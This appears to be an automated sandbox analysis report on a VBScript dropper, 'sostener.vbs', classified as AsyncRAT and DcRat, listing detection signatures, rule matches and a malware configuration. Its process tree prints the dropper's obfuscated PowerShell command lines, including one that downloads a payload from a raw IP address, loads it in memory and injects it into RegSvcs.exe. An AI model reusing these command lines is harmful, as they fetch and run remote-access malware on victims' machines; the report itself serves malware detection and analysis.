Edit tour
Windows
Analysis Report
sostener.vbs
Overview
General Information
Detection
AsyncRAT, DcRat
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AsyncRAT
Yara detected DcRat
Yara detected Powershell download and execute
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5332 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\soste ner.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 3848 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $ExeNy = ' J Bx Gs dg B3 HI I 9 C Jw w Cc Ow k Gk YQ Bx HU Yw g D0 I n CU c B6 EE Y wBP Gc SQB u E0 cg l Cc OwBb EI eQB0 GU W wBd F0 I k Hk dwBq G Q a g D0 I Bb HM eQB z HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgB G HI bwBt EI YQBz GU Ng 0 FM d By Gk bgB n Cg I o E 4 ZQB3 C0 TwBi Go ZQ Bj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB 0 Ck LgBE G8 dwBu Gw bwBh GQ U wB0 HI aQB u Gc K n G g d B0 H O g v C8 OQ x C4 Mg w DI Lg y DM Mw u DE N g 5 C8 V B h Gs LwBS GU Zw v E0 YQBy Ho L wBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 Q QBw H R Bv G0 YQBp G 4 XQ 6 Do QwB1 HI cg Bl G4 d BE G8 bQBh G k bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew a QBi HI YQB y Hk MQ u EM b Bh HM cw x Cc K Q u Ec ZQB 0 E0 ZQB0 Gg bwBk Cg JwBa Hg S wBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQ Bs Gw L g Fs bwBi Go ZQBj HQ W wBd F0 I o Cc d B4 H Q Lg x Eo R v FM VgB O EU LwB6 HI YQBN C8 ZwBl FI L wBr GE V v Dk Ng x C 4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwB S Gc dgB1 Ec Jw s C J Bx Gs dg B3 HI L g Cc MQ n Cw I n FI bw Bk GE Jw g Ck KQ 7 = =';$KByHL = [system. Text.Encod ing]::Unic ode.GetStr ing( [syst em.Convert ]::FromBas e64String( $ExeNy.re place(' ', 'A') ) );$ KByHL = $K ByHL.repla ce('%pzAcO gInMr%', ' C:\Users\u ser\Deskto p\sostener .vbs');pow ershell $K ByHL; MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 1880 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4312 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$qkvwr = '0';$iaquc = 'C:\Use rs\user\De sktop\sost ener.vbs'; [Byte[]] $ ywjdh = [s ystem.Conv ert]::From Base64Stri ng( (New-O bject Net. WebClient) .DownloadS tring('htt p://91.202 .233.169/T ak/Reg/Mar z/DRG/RTC/ F3dll.txt' ));[system .AppDomain ]::Current Domain.Loa d($ywjdh). GetType('C lassLibrar y1.Class1' ).GetMetho d('ZxKHG') .Invoke($n ull, [obje ct[]] ('tx t.1JD/SVNE /zraM/geR/ kaT/961.33 2.202.19// :ptth' , $ iaquc , 'R gvuG', $qk vwr, '1', 'Roda' )); " MD5: 04029E121A0CFA5991749937DD22A1D9) - RegSvcs.exe (PID: 6884 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
AsyncRAT | AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
DCRat | DCRat is a typical RAT that has been around since at least June 2019. | No Attribution |
{"Server": ")8\"zc", "Ports": "$A<IlE,84,7;&gV", "Version": "*wacp!]6l[e", "BDOS": "U^2", "AES_key": "R4OsSR16j3MjPEBlkfzyOGTLnlxVVuwW", "Mutex": "n#QO", "Certificate": "UDq5O^", "ServerSignature": "1", "Group": "Oy\\iql0S13XbS4sp1@PsWg:PGIw'~?Q;ifHa#3ef8L\"SpWzk,&&}s;$/?J9UH3>j3={V'nCn.PI*|e>4&k2[2Y\"w$T+^X_j9HSG[?b*'54eS5e_~(e#Z\"n,TX*T->_qfnrv]TM^:Sm1uBPI9|\\4a^^?R|av{V =9J2E|^{wS7Zq,=)a;uL uRaE\"K5bW ycl@NpcoGBww~DzGBkD+U1vws!$\"Awn}G}9cJ6;M^g4xsh'`s^(KX%.#m`^wc.Syd?~c\"Lsj>]?`qx7a!]~a7*CV\\/w6F+j0{&]M*&[7-]2Y</uTKz[gT&GM", "AntiProcess": "HB!<i[>IoEHueVuN1#fc!@?Z#TsdM.i5RX/xjjmOH +NC,v <85~NN!Z.)uebFY`", "PasteBin": "FLVl;"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen |
| |
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
| |
Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
| |
Click to see the 14 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen |
| |
JoeSecurity_AsyncRAT | Yara detected AsyncRAT | Joe Security | ||
Windows_Trojan_DCRat_1aeea1ac | unknown | unknown |
| |
INDICATOR_SUSPICIOUS_EXE_B64_Artifacts | Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. | ditekSHen |
| |
Click to see the 16 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |